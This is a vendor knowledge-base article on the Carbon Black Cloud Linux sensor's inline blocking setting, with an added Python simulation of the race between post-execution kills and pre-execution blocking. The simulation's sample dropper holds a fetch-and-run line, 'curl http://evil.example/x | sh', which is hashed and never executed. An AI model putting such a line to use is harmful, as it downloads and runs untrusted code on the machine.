Environment
- Carbon Black Cloud Console: Build 1.23 and Higher
- Linux: Sensor Version 2.16.0 and Higher
- OS Distributions supported: eBPF Distros
Question
What is the "Block known bad files before execution" setting?
Answer
Inline Blocking (ILB) is the Linux sensor capability behind this setting. It pauses a binary at execution, checks its hash against the locally cached policy, and prevents a known-bad binary from running at all rather than terminating it after it has started.
Additional Notes
- To enable Inline Blocking, follow the steps below:
- Log into the Console
- Navigate to Enforce page
- Navigate to Policies
- Enable “Block known bad files before execution”.
- Tip: “Pause executables to analyze and attempt to block known bad files before they run. Increases security but may impact overall performance in high-performance computing environments.”
- To mitigate potential adverse effects on system performance, the pause is bounded by a timeout, so the delay added to each execution cannot grow without limit while the verdict is computed.
- Enabling this setting for sensors that are not running a supported version (see Environment above) has no effect on the endpoint.
- Before inline blocking, the sensor allowed every binary to begin running long enough to compute its hash and evaluate it against the locally cached policy rules. If the binary was identified as malicious, the sensor terminated its process. That left a race window: a short-running binary could finish its work before the termination landed. Inline blocking for Linux closes that window by holding execution until the verdict is available, so a known-bad binary is blocked before it executes at all.
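The race window described above, shown as an added simulation that is not Carbon Black Cloud sensor code. It models the two behaviours with a virtual clock instead of real time: in the post-exec model the binary starts at t=0 and is killed only when the hash verdict arrives, so a process whose work takes less time than the verdict wins the race; in the inline model exec is held until the verdict, bounded by the timeout. The binaries, hashes, runtimes, latencies and the known-bad list are constructed for the example, and what the sensor does when the pause hits its timeout is not stated in the article, so the fallback modelled here (release the process and continue on the post-exec path) is an assumption of this model only.

```python
"""Post-execution kill vs inline blocking, simulated with a virtual clock.

Added illustration, not Carbon Black Cloud sensor code. All inputs below are
constructed for the example; times are in virtual milliseconds.
"""
import hashlib
from dataclasses import dataclass
from typing import Optional

# Constructed known-bad list: SHA-256 of a fake dropper script.
KNOWN_BAD_SHA256 = {
    hashlib.sha256(b"#!/bin/sh\ncurl http://evil.example/x | sh\n").hexdigest(),
}


@dataclass
class Binary:
    name: str
    content: bytes
    runtime_ms: int  # virtual time the process needs to finish its work


@dataclass
class Outcome:
    model: str
    blocked_before_exec: bool   # never started at all
    killed_at_ms: Optional[int]  # absolute time the kill landed, if any
    work_completed: bool        # did the binary finish before being stopped?


def verdict(binary: Binary) -> bool:
    """True if the binary's hash is on the cached known-bad list."""
    return hashlib.sha256(binary.content).hexdigest() in KNOWN_BAD_SHA256


def post_exec_kill(binary: Binary, verdict_latency_ms: int) -> Outcome:
    """Pre-ILB behaviour: exec proceeds at t=0; kill lands when the verdict arrives."""
    if not verdict(binary):
        return Outcome("post-exec", False, None, True)
    # The process runs for verdict_latency_ms before the kill can be delivered.
    # If its work finishes first, the kill is too late.
    finished_first = binary.runtime_ms <= verdict_latency_ms
    return Outcome("post-exec", False, verdict_latency_ms, finished_first)


def inline_block(binary: Binary, verdict_latency_ms: int, timeout_ms: int) -> Outcome:
    """ILB behaviour: exec is held until the verdict, for at most timeout_ms."""
    if verdict_latency_ms <= timeout_ms:
        # Verdict arrives while exec is still paused: a known-bad binary never
        # starts; a clean one starts late by verdict_latency_ms but completes.
        if verdict(binary):
            return Outcome("inline", True, None, False)
        return Outcome("inline", False, None, True)
    # Pause hit the timeout before a verdict. ASSUMPTION of this model only:
    # the process is released at timeout_ms and the post-exec path takes over,
    # so the kill lands at the absolute time the verdict arrives.
    released = post_exec_kill(binary, verdict_latency_ms - timeout_ms)
    killed_at = None if released.killed_at_ms is None else verdict_latency_ms
    return Outcome("inline(timeout)", False, killed_at, released.work_completed)


# Constructed sample binaries: a short-running dropper and a clean tool.
DROPPER = Binary("dropper.sh", b"#!/bin/sh\ncurl http://evil.example/x | sh\n", runtime_ms=5)
CLEAN = Binary("ls", b"\x7fELF clean-binary-stand-in", runtime_ms=100)


def run_scenarios(verdict_latency_ms: int = 20, timeout_ms: int = 500):
    """Return outcomes for both models so the race window can be compared."""
    return {
        (b.name, o.model): o
        for b in (DROPPER, CLEAN)
        for o in (post_exec_kill(b, verdict_latency_ms),
                  inline_block(b, verdict_latency_ms, timeout_ms))
    }


if __name__ == "__main__":
    for (name, model), o in run_scenarios().items():
        print(f"{name:10} {model:10} blocked={o.blocked_before_exec} "
              f"killed_at={o.killed_at_ms} completed={o.work_completed}")
```

With the constructed numbers the dropper needs 5 ms and the verdict takes 20 ms, so under the post-exec model it completes before the kill, while under inline blocking it never starts; the clean binary runs to completion under both models, only delayed by the verdict latency in the inline case.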